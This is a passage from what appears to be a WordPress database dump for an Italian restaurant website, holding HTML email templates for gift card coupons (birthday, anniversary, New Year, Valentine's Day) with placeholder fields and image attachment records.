role=\"presentation\" border=\"0\" width=\"600\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 10px; text-align: left;\">[LOGO]</td>\r\n<td style=\"padding: 20px 10; text-align: right;\">\r\n<h5><span style=\"font-size: 15px; font-family: arial; display: block;\">Buono del valore di [AMOUNT]</span><span style=\"font-size: 15px;\"><em><span style=\"font-family: arial; display: block;\">(Scadenza: [EXPIRYDATE])</span></em></span></h5>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"email-container\" style=\"margin: auto; width: 100%!important;\" role=\"presentation\" border=\"0\" width=\"600\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px;\" align=\"center\" valign=\"top\">\r\n<table role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top; width: 50%;\">\r\n<table role=\"presentation\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px; text-align: center;\">[DEFAULTEVENT]</td>\r\n</tr>\r\n<tr>\r\n<td class=\"center-on-narrow\" style=\"font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #555555; padding: 0 10px 10px; text-align: left;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top; width: 50%;\">\r\n<table role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px;\">\r\n<p style=\"min-height: 190px;\">[MESSAGE]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td class=\"center-on-narrow\" style=\"font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #555555; padding: 0 10px 10px; text-align: left;\">\r\n<p style=\"font-size: 14px; font-family: sans-serif; margin: 0; font-weight: bold;\"><span style=\"width: 22%; float: left; word-wrap: break-word; word-break: break-all; padding: 0 3% 0 0; text-align: right;\">Da :</span><span style=\"width: 75%; float: left; word-wrap: break-word; word-break: break-all;\">[FROM]</span></p>\r\n<p style=\"font-size: 14px; font-family: sans-serif; margin: 0; font-weight: bold;\"><span style=\"width: 22%; float: left; word-wrap: break-word; word-break: break-all; padding: 0 3% 0 0; text-align: right;\">Per :</span><span style=\"width: 75%; float: left; word-wrap: break-word; word-break: break-all;\">[TO]</span></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 40px 0px;\" align=\"center\"><span style=\"font-size: 25px;\">Codice Coupon</span>\r\n<p style=\"background-color: #e91e63; color: #fff; padding: 10px 10px; font-size: 26px; font-family: arial; margin: 10px 0px 10px 0px; letter-spacing: 10px; word-wrap: break-word; word-break: break-all;\">[COUPON]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"email-container\" style=\"margin: auto; width: 100%!important;\" role=\"presentation\" border=\"0\" width=\"600\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" bgcolor=\"#333333\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px 10px; width: 100%; font-size: 14px; font-weight: bold; font-family: sans-serif; mso-height-rule: exactly; line-height: 18px; text-align: center; color: #ffffff;\" bgcolor=\"#333333\">[DISCLAIMER]</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<style type=\"text/css\">@media screen and (max-width: 480px){.stack-column,.stack-column-center{display: block !important;width: 100% !important;max-width: 100% !important;direction: ltr !important;}.stack-column-center{text-align: center !important;}}</style>','Template personalizzato','','publish','closed','closed','','template3','','','2017-07-10 22:10:47','2017-07-10 20:10:47','',0,'http://www.ristorantesolymar.it/2017/07/10/template3/',0,'giftcard','',0),(402,1,'2017-07-10 21:32:44','2017-07-10 19:32:44','[product_category category=\'mwb_wgm_giftcard\']','Gift Card','','publish','closed','closed','','gift-card','','','2017-07-10 21:32:44','2017-07-10 19:32:44','',0,'http://www.ristorantesolymar.it/gift-card/',0,'page','',0),(403,0,'2017-07-10 21:32:46','2017-07-10 19:32:46','','giftimg','','inherit','open','closed','','giftimg','','','2017-07-10 21:32:46','2017-07-10 19:32:46','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/giftimg.png',0,'attachment','image/png',0),(404,0,'2017-07-10 21:32:46','2017-07-10 19:32:46','','giftimg2','','inherit','open','closed','','giftimg2','','','2017-07-10 21:32:46','2017-07-10 19:32:46','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/giftimg2.png',0,'attachment','image/png',0),(405,0,'2017-07-10 21:32:46','2017-07-10 19:32:46','<table class=\"email-container\" style=\"margin: 0 auto;background-color: #ff9898;border-spacing: 20px\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td style=\"padding:10px\"><table class=\"email-container\" style=\"border:2px dashed #ffffff!important;margin: 0 auto;width:100%;padding:10px 0px\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td style=\"padding: 20px 0;text-align: left\"><a style=\"text-decoration: none;color: #ffffff;margin-left: 10px\">[LOGO]</a></td></tr><tr><td style=\"padding: 20px 0;text-align: center\"><span style=\"font-size: 22px;color: #ffffff;border-top: 1px solid #ffffff;border-bottom: 1px solid #ffffff;padding: 10px;font-family: Arial, Helvetica, sans-serif\">Valentine’s Day </span></td></tr><tr><td class=\"img-block\" style=\"text-align: center;padding: 20px 0px\">[FEATUREDIMAGE]</td></tr></tbody></table></td></tr></tbody></table>&nbsp;<table class=\"email-container\" style=\"margin: auto\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td style=\"text-align: center;font-family: sans-serif;font-size: 15px;line-height: 20px;color: #555555\" bgcolor=\"#ffffff\"></td></tr><tr><td style=\"text-align: center;background-color: #ffd5d5;padding:10px\" valign=\"middle\"><div><table style=\"border-spacing: 20px;border: 2px dashed #ffffff!important\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td style=\"padding:10px 0px;font-family: sans-serif;line-height: 20px;color: #ff9898;text-align: center;border: 3px\" valign=\"middle\"><h2 style=\"padding: 0px;margin:10px 0px;font-family: Arial, Helvetica, sans-serif;font-size: 15px;text-align: center\">COUPON CODE</h2><p style=\"font-size: 25px;font-weight:bold;margin:0px;text-align: center\">[COUPON]</p><span style=\"font-size: 15px;text-align: center;padding:10px 0px\">(Ed. [EXPIRYDATE])</span></td></tr></tbody></table></div></td></tr><tr><td style=\"padding: 15px\" align=\"center\" valign=\"top\" bgcolor=\"#ffffff\"><table border=\"0\" width=\"100%;\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"stack-column-center\" style=\"vertical-align: top;width: 50%\"><table border=\"0\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td style=\"padding: 10px;text-align: center;width: 50%\">[DEFAULTEVENT]</td></tr></tbody></table></td><td class=\"stack-column-center\" style=\"vertical-align: top\"><table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"100%\"><tbody><tr><td class=\"center-on-narrow\" style=\"font-family: sans-serif;font-size: 15px;line-height: 20px;color: #555555;padding: 10px;text-align: left\"><p style=\"min-height: 180px\">[MESSAGE]</p></td></tr><tr><td style=\"padding: 0 10px;color: #373737\"><span style=\"width:22%;float: left;padding: 0 3% 0 0;text-align: right\">From :</span><span style=\"width:75%;float: left\">[FROM]</span></td></tr><tr><td style=\"padding: 5px 10px;color: #373737\"><span style=\"width:22%;float: left;padding: 0 3% 0 0;text-align: right\">To :</span><span style=\"width:75%;float: left\">[TO]</span></td></tr><tr><td style=\"padding: 5px 10px;color: #373737\"><h2 style=\"font-size: 30px;font-family: Arial, Helvetica, sans-serif\">[AMOUNT]</h2></td></tr></tbody></table></td></tr></tbody></table></td></tr><tr><td style=\"text-align: center;padding: 15px;color: #ffffff;background-color: #ff9898;font-size: 18px;font-family: Arial, Helvetica, sans-serif\">[DISCLAIMER]</td></tr></tbody></table>','Valentine\'s Day Special 1','','publish','closed','closed','','valentines-day-special-1','','','2017-07-10 21:32:46','2017-07-10 19:32:46','',0,'http://www.ristorantesolymar.it/giftcard/valentines-day-special-1/',0,'giftcard','',0),(406,0,'2017-07-10 21:32:46','2017-07-10 19:32:46','<table class=\"email-container\" style=\"margin: auto;text-align: center ! important;background-color: #fc3f3f;width: 600px\" border=\"0\" width=\"600px\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td style=\"text-align: left;padding: 20px 10px\">[LOGO]</td></tr><tr><td style=\"padding: 30px 0px !important\">[FEATUREDIMAGE]</td></tr></tbody></table><table class=\"email-container\" style=\"margin: auto\" border=\"0\" width=\"600\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td class=\"mwb_coupon_section\" valign=\"middle\" bgcolor=\"#222222\"><div><table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td style=\"width: 50%;text-align: center;padding: 65px 0px;font-family: sans-serif;font-size: 15px;line-height: 20px;color: #000\" valign=\"middle\"></td><td style=\"width: 50%;text-align: center;padding: 65px 0px;font-family: sans-serif;font-size: 15px;line-height: 20px;color: #000\" valign=\"middle\"><p style=\"color: #fc3f3f;font-size: 16px;margin: 0px\">Coupon Code</p><p style=\"color: #fc3f3f;font-size: 18px;font-weight: bold;margin: 0px\">[COUPON]</p><p style=\"font-family: sans-serif;color: #fc3f3f;font-size: 18px;font-weight: bold;margin: 0px\">(Ed. [EXPIRYDATE] )</p></td></tr></tbody></table></div></td></tr><tr><td style=\"padding: 10px\" align=\"center\" valign=\"top\" bgcolor=\"#fcd63f\"><table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"stack-column-center\" style=\"width: 50%;vertical-align: top\"><table border=\"0\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td style=\"padding: 10px;text-align: center;width: 50%\">[DEFAULTEVENT]</td></tr></tbody></table></td><td class=\"stack-column-center\" style=\"width: 50%;vertical-align: top;padding: 10px\"><table width=\"100%\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td><p style=\"font-size: 15px;line-height: 1.5;font-family: sans-serif;min-height: 180px\">[MESSAGE]</p></td></tr><tr><td style=\"padding: 25px 0px 0px 0px\"><span style=\"width:22%;float: left;padding: 0 3% 0 0;text-align: right\"> From :</span> <span style=\"width:75%;float: left\"> [FROM] </span></td></tr><tr><td><span style=\"width:22%;float: left;padding: 0 3% 0 0;text-align: right\">To :</span> <span style=\"width:75%;float: left\"> [TO] </span></td></tr><tr><td><h2 style=\"font-size: 30px;font-family: Arial, Helvetica, sans-serif\">[AMOUNT]</h2></td></tr></tbody></table></td></tr></tbody></table></td></tr><tr><td bgcolor=\"#fc3f3f\"><table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td style=\"padding: 20px 0px;text-align: center;font-family: sans-serif;font-size: 15px;line-height: 20px;color: #ffffff\">[DISCLAIMER]</td></tr></tbody></table></td></tr></tbody></table>\n			','Valentine\'s Day Special 2','','publish','closed','closed','','valentines-day-special-2','','','2017-07-10 21:32:46','2017-07-10 19:32:46','',0,'http://www.ristorantesolymar.it/giftcard/valentines-day-special-2/',0,'giftcard','',0),(407,1,'2017-07-10 21:36:37','2017-07-10 19:36:37','','sol-y-mar-logo-150','','inherit','open','closed','','sol-y-mar-logo-150-2','','','2017-07-10 21:36:37','2017-07-10 19:36:37','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png',0,'attachment','image/png',0),(408,1,'2017-07-10 21:43:25','2017-07-10 19:43:25','','anniversary','','inherit','open','closed','','anniversary','','','2017-07-10 21:43:25','2017-07-10 19:43:25','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/anniversary.png',0,'attachment','image/png',0),(409,1,'2017-07-10 21:43:25','2017-07-10 19:43:25','','birthday','','inherit','open','closed','','birthday','','','2017-07-10 21:43:25','2017-07-10 19:43:25','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/birthday.png',0,'attachment','image/png',0),(410,1,'2017-07-10 21:43:25','2017-07-10 19:43:25','','newyear','','inherit','open','closed','','newyear','','','2017-07-10 21:43:25','2017-07-10 19:43:25','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/newyear.png',0,'attachment','image/png',0),(411,1,'2017-07-10 21:43:25','2017-07-10 19:43:25','','eid','','inherit','open','closed','','eid','','','2017-07-10 21:43:25','2017-07-10 19:43:25','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/eid.png',0,'attachment','image/png',0),(412,1,'2017-07-10 21:43:26','2017-07-10 19:43:26','<center style=\"width: 100%; background: #222222;\"><div style=\"display:none;font-size:1px;line-height:1px;max-height:0px;max-width:0px;opacity:0;overflow:hidden;mso-hide:all;font-family: sans-serif;\">(Optional) This text will appear in the inbox preview, but not the email body.</div><table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" width=\"600\" style=\"margin: auto\" class=\"email-container\"><tr><td style=\"background:#311438; padding-left: 15px;\"> <p style=\"color:#fff; font-size: 25px; font-family: sans-serif; padding: 30px 0 0; margin: 0px;\"><strong>[LOGO]</strong></p></td></tr></table><table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto;\" class=\"email-container\"><tr><td bgcolor=\"#311438\" style=\"padding-bottom: 30px;\"> <span class=\"feature_img\">[FEATUREDIMAGE]</span></td></tr><tr><td bgcolor=\"#feffda\" style=\"padding:30px; text-align: center; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; color: #555555; \"></td><tr style=\"background-color: #afcb0c\"><td style=\"color: #fff; font-size:20px; letter-spacing: 1px; margin:0; text-transform: uppercase; background-color: #afcb0c; padding:20px 10px; line-height: 15px\"> <p style=\"border: 2px dashed #ffffff; color: #fff; font-size:20px; letter-spacing: 1px; padding: 30px 10px; line-height: 30px; margin:0; text-transform: uppercase; background-color: #afcb0c; text-align: center;\">Coupon Code<span style=\"display:block; font-size: 25px;\">[COUPON]</span><span style=\"display:block;\">Ed:[EXPIRYDATE]</span></p></td></tr><td bgcolor=\"#feffda\" style=\"padding-top: 45px; text-align: center; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; color: #555555; \"></td></tr><tr><td bgcolor=\"#feffda\" dir=\"ltr\" align=\"center\" valign=\"top\" width=\"100%\" style=\"padding-bottom: 44px;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr> <td width=\"50%\" class=\"stack-column-center\" style=\"vertical-align:top;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr> <td dir=\"ltr\" valign=\"top\" style=\"padding: 0px 25px;\"> [DEFAULTEVENT] </td></tr></table> </td><td width=\"50%\" class=\"stack-column-center\" style=\"vertical-align: top;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr> <td dir=\"ltr\" valign=\"top\" style=\"font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #ffffff; padding: 0px 15px; text-align: left;\" class=\"center-on-narrow\"> <p style=\"font-size: 15px; line-height: 24px; text-align: justify; color: #535151; min-height: 200px;white-space: pre-line;\">[MESSAGE] </p></td></tr><tr><td class=\"mail-content\" style=\"word-wrap: break-word;font-family: sans-serif; padding: 0px 15px;\"><span style=\"color: #535151; font-size: 15px; float: left; vertical-align: top; margin-right: 2% text-align: right; display-inline: block; width: 18%;\">From- </span> <span style=\"color: #535151; font-size: 14px; vertical-align: top; display: inline-block; width: 180px; float: left;\">[FROM]</span></td></tr><tr><td style=\"word-wrap: break-word; font-family: sans-serif; padding: 0px 15px;\"><span style=\"color:#535151; font-size: 15px; max-width: 15%; float: left; margin-right: 2%; text-align: right; width: 100%; display: inline-block; vertical-align: top;\">To- </span> <span style=\"color: #535151; font-size: 14px; width: 180px; float: left; vertical-align: top;\">[TO]</span></td></tr><tr><td style=\"padding: 5px 10px; word-wrap: break-word;\"><span style=\"color: #8a2814; font-size: 23.96px; vertical-align: top;\"><strong>[AMOUNT]/-</strong> </span></td></tr></table> </td></tr></table></td></tr><tr><td bgcolor=\"#6f3e7f\"><table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" width=\"100%\"> <tr> <td style=\"padding: 40px 30px; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #ffffff;\"> <p style=\"font-weight: bold; text-align:center;\"> [DISCLAIMER] </p></td></tr></table></td></tr></table></center><style>@media screen and (max-width: 600px){.email-container{width: 100% !important;margin: auto !important;}/* What it does: Forces elements to resize to the full width of their container. Useful for resizing images beyond their max-width. */.fluid{max-width: 90% !important;height: auto !important;margin-left: auto !important;margin-right: auto !important;}/* What it does: Generic utility class for centering. Useful for images, buttons, and nested tables. */.center-on-narrow{text-align: center !important;display: block !important;margin-left: auto !important;margin-right: auto !important;float: none !important;}table.center-on-narrow{display: inline-block !important;}}@media screen and (max-width: 476px){/* What it does: Forces table cells into full-width rows. */.stack-column,.stack-column-center{display: block !important;width: 100% !important;max-width: 100% !important;direction: ltr !important;}/* And center justify these ones. */.stack-column-center{text-align: center !important;}}</style>','Happy New Year','','publish','closed','closed','','happy-new-year','','','2017-07-10 21:43:26','2017-07-10 19:43:26','',0,'http://www.ristorantesolymar.it/giftcard/happy-new-year/',0,'giftcard','',0),(413,1,'2017-07-10 21:43:26','2017-07-10 19:43:26','<center style=\"width: 100%; background: #222222;\"> <div style=\"display:none;font-size:1px;line-height:1px;max-height:0px;max-width:0px;opacity:0;overflow:hidden;mso-hide:all;font-family: sans-serif;\"> (Optional) This text will appear in the inbox preview, but not the email body. </div><table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto\" class=\"email-container\"> <tr> <td style=\"text-align: center; background:#E25A9D \"> <p style=\"color:#fff; font-size: 25px; font-family: sans-serif; padding: 30px 0 0; margin: 0px;\"><strong>[LOGO]</strong></p></td></tr></table> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto;\" class=\"email-container\"> <tr> <td bgcolor=\"#E25A9D\" style=\"padding-bottom: 30px;\"> <span class=\"feature_img\">[FEATUREDIMAGE]</span> </td></tr><tr> <td bgcolor=\"#FFE0EF\" style=\"padding:30px; text-align: center; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; color: #555555; \"></td><tr style=\"background-color: #E25A9D\"><td style=\"color: #fff; font-size:20px; letter-spacing: 1px; margin:0; text-transform: uppercase; background-color: #E25A9D; padding:20px 10px; line-height: 0;\"> <p style=\"border: 2px dashed #ffffff; color: #fff; font-size:20px; letter-spacing: 1px; padding: 30px 10px; margin:0; text-transform: uppercase; background-color: #E25A9D; text-align: center; line-height: 30px;\">Coupon Code<span style=\"display:block; font-size: 25px;\">[COUPON]</span><span style=\"display:block;\">Ed:[EXPIRYDATE]</span></p><br><br></td></tr><td bgcolor=\"#FFE0EF\" style=\"padding-top: 45px; text-align: center; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; color: #555555; \"> </td></tr><tr> <td bgcolor=\"#ffe0ef\" dir=\"ltr\" align=\"center\" valign=\"top\" width=\"100%\" style=\"padding-bottom: 44px;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr> <td width=\"50%\" class=\"stack-column-center\" style=\"vertical-align:top;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr> <td dir=\"ltr\" valign=\"top\" style=\"padding: 0px 25px;\"> [DEFAULTEVENT] </td></tr></table> </td><td width=\"50%\" class=\"stack-column-center\" style=\"vertical-align: top;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr> <td dir=\"ltr\" valign=\"top\" style=\"font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #ffffff; padding: 0px 15px; text-align: left;\" class=\"center-on-narrow\"> <p style=\"font-size: 15px; line-height: 24px; text-align: justify; color: #535151; min-height: 200px;white-space: pre-line;\">[MESSAGE] </p></td></tr><tr><td class=\"mail-content\" style=\"word-wrap: break-word;font-family: sans-serif; padding: 0px 15px;\"><span style=\"color: #535151; font-size: 15px; float: left; vertical-align: top; margin-right: 2% text-align: right; display-inline: block; width: 18%;\">From- </span> <span style=\"color: #535151; font-size: 14px; vertical-align: top; display: inline-block; width: 180px; float: left;\">[FROM]</span></td></tr><tr><td style=\"word-wrap: break-word; font-family: sans-serif; padding: 0px 15px;\"><span style=\"color:#535151; font-size: 15px; max-width: 15%; float: left; margin-right: 2%; text-align: right; width: 100%; display: inline-block; vertical-align: top;\">To- </span> <span style=\"color: #535151; font-size: 14px; width: 180px; float: left; vertical-align: top;\">[TO]</span></td></tr><tr><td style=\"padding: 5px 10px; word-wrap: break-word;\"><span style=\"color: #8a2814; font-size: 23.96px; vertical-align: top;\"><strong>[AMOUNT]/-</strong> </span></td></tr></table> </td></tr></table> </td></tr><tr> <td bgcolor=\"#e5609f\"> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" width=\"100%\"> <tr> <td style=\"padding: 40px 30px; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #ffffff;\"> <p style=\"font-weight: bold; text-align:center;\"> [DISCLAIMER] </p></td></tr></table> </td></tr></table></center><style>@media screen and (max-width: 600px){.email-container{width: 100% !important; margin: auto !important;}/* What it does: Forces elements to resize to the full width of their container. Useful for resizing images beyond their max-width. */ .fluid{max-width: 90% !important; height: auto !important; margin-left: auto !important; margin-right: auto !important;}/* What it does: Forces table cells into full-width rows. */ /* What it does: Generic utility class for centering. Useful for images, buttons, and nested tables. */ .center-on-narrow{text-align: center !important; display: block !important; margin-left: auto !important; margin-right: auto !important; float: none !important;}table.center-on-narrow{display: inline-block !important;}}@media screen and (max-width: 476px){/* What it does: Forces table cells into full-width rows. */ .stack-column, .stack-column-center{display: block !important; width: 100% !important; max-width: 100% !important; direction: ltr !important;}/* And center justify these ones. */ .stack-column-center{text-align: center !important;}}</style>','Happy Birth Day','','publish','closed','closed','','happy-birth-day','','','2017-07-10 21:43:26','2017-07-10 19:43:26','',0,'http://www.ristorantesolymar.it/giftcard/happy-birth-day/',0,'giftcard','',0),(414,1,'2017-07-10 21:43:26','2017-07-10 19:43:26','<center style=\"width: 100%; background: #222222;\"> <div style=\"display:none;font-size:1px;line-height:1px;max-height:0px;max-width:0px;opacity:0;overflow:hidden;mso-hide:all;font-family: sans-serif;\"> (Optional) This text will appear in the inbox preview, but not the email body. </div><table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto\" class=\"email-container\"> <tr> <td style=\"text-align: center; background:#f6f6f6\"> <p style=\"color:#192845; font-size: 25px; font-family: sans-serif;margin: 0px;\"><strong>[LOGO]</strong></p></td></tr></table> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto;\" class=\"email-container\"> <tr> <td bgcolor=\"#f6f6f6\" style=\"padding-bottom: 30px;\"> <span class=\"feature_img\">[FEATUREDIMAGE]</span> </td></tr><tr> <td bgcolor=\"#f6f6f6\" style=\"padding:30px; text-align: center; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; color: #555555; \"></td><tr style=\"background-color: #192845\"><td style=\"color: #fff; font-size:20px; letter-spacing: 1px; margin:0; text-transform: uppercase; background-color: #192845; padding:20px 10px; line-height: 0\"> <p style=\"border: 2px dashed #ffffff; color: #fff; font-size:20px; letter-spacing: 1px; padding: 30px 10px; line-height: 30px; margin:0; text-transform: uppercase; background-color: #192845; text-align: center;\">Coupon Code<span style=\"display:block; font-size: 25px;\">[COUPON]</span><span style=\"display:block;\">Ed:[EXPIRYDATE]</span></p></td></tr><td bgcolor=\"#f6f6f6\" style=\"padding-top: 45px; text-align: center; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; color: #555555; \"> </td></tr><tr> <td bgcolor=\"#f6f6f6\" dir=\"ltr\" align=\"center\" valign=\"top\" width=\"100%\" style=\"padding-bottom: 44px;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr> <td width=\"50%\" class=\"stack-column-center\" style=\"vertical-align:top;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr> <td dir=\"ltr\" valign=\"top\" style=\"padding: 0px 25px;\"> [DEFAULTEVENT] </td></tr></table> </td><td width=\"50%\" class=\"stack-column-center\" style=\"vertical-align: top;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr> <td dir=\"ltr\" valign=\"top\" style=\"font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #ffffff; padding: 0px 15px; text-align: left;\" class=\"center-on-narrow\"> <p style=\"font-size: 15px; line-height: 24px; text-align: justify; color: #535151;min-height: 200px;white-space: pre-line;\">[MESSAGE] </p></td></tr><tr><td class=\"mail-content\" style=\"word-wrap: break-word;font-family: sans-serif; padding: 0px 15px;\"><span style=\"color: #535151; font-size: 15px; float: left; vertical-align: top; margin-right: 2% text-align: right; display-inline: block; width: 18%;\">From- </span> <span style=\"color: #535151; font-size: 14px; vertical-align: top; display: inline-block; width: 180px; float: left;\">[FROM]</span></td></tr><tr><td style=\"word-wrap: break-word; font-family: sans-serif; padding: 0px 15px;\"><span style=\"color:#535151; font-size: 15px; max-width: 15%; float: left; margin-right: 2%; text-align: right; width: 100%; display: inline-block; vertical-align: top;\">To- </span> <span style=\"color: #535151; font-size: 14px; width: 180px; float: left; vertical-align: top;\">[TO]</span></td></tr><tr><td style=\"padding: 5px 10px; word-wrap: break-word;\"><span style=\"color: #8a2814; font-size: 23.96px; vertical-align: top;\"><strong>[AMOUNT]/-</strong> </span></td></tr></table> </td></tr></table> </td></tr><tr> <td bgcolor=\"#e95261\"> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" width=\"100%\"> <tr> <td style=\"padding: 40px 30px; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #ffffff;\"> <p style=\"font-weight: bold; text-align:center;\"> [DISCLAIMER] </p></td></tr></table> </td></tr></table></center><style>@media screen and (max-width: 600px){.email-container{width: 100% !important; margin: auto !important;}/* What it does: Forces elements to resize to the full width of their container. Useful for resizing images beyond their max-width. */ .fluid{max-width: 90% !important; height: auto !important; margin-left: auto !important; margin-right: auto !important;}/* What it does: Generic utility class for centering. Useful for images, buttons, and nested tables. */ .center-on-narrow{text-align: center !important; display: block !important; margin-left: auto !important; margin-right: auto !important; float: none !important;}table.center-on-narrow{display: inline-block !important;}}@media screen and (max-width: 476px){/* What it does: Forces table cells into full-width rows. */ .stack-column, .stack-column-center{display: block !important; width: 100% !important; max-width: 100% !important; direction: ltr !important;}/* And center justify these ones. */ .stack-column-center{text-align: center !important;}}</style>','Happy Anniversary','','publish','closed','closed','','happy-anniversary','','','2017-07-10 21:43:26','2017-07-10 19:43:26','',0,'http://www.ristorantesolymar.it/giftcard/happy-anniversary/',0,'giftcard','',0),(415,1,'2017-07-10 21:43:26','2017-07-10 19:43:26','<center style=\"width: 100%; background: #222222;\"><div style=\"display: none; font-size: 1px; line-height: 1px; max-height: 0px; max-width: 0px; opacity: 0; overflow: hidden; mso-hide: all; font-family: sans-serif;\">(Optional) This text will appear in the inbox preview, but not the email body.</div><table class=\"email-container\" style=\"margin: auto;\" border=\"0\" width=\"600\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td style=\"text-align: center; background: #0e0149;\"><p style=\"color: #0e0149; font-size: 25px; font-family: sans-serif; margin: 0px; text-align: left;\"><strong>[LOGO]</strong></p></td></tr></tbody></table><table class=\"email-container\" style=\"margin: auto;\" border=\"0\" width=\"600\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td style=\"padding-bottom: 0px;\" bgcolor=\"#f6f6f6\"><span class=\"feature_img\">[FEATUREDIMAGE]</span></td></tr><tr><td style=\"padding: 30px; text-align: center; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; color: #555555;\" bgcolor=\"#d6ccfd\"></td></tr><tr style=\"background-color: #0e0149;\"><td style=\"color: #fff; font-size: 20px; letter-spacing: 1px; margin: 0; text-transform: uppercase; background-color: #0e0149; padding: 20px 10px; line-height: 0;\"><p style=\"border: 2px dashed #ffffff; color: #fff; font-size: 20px; letter-spacing: 1px; padding: 30px 10px; line-height: 30px; margin: 0; text-transform: uppercase; background-color: #0e0149; text-align: center;\">Coupon Code<span style=\"display: block; font-size: 25px;\">[COUPON]</span><span style=\"display: 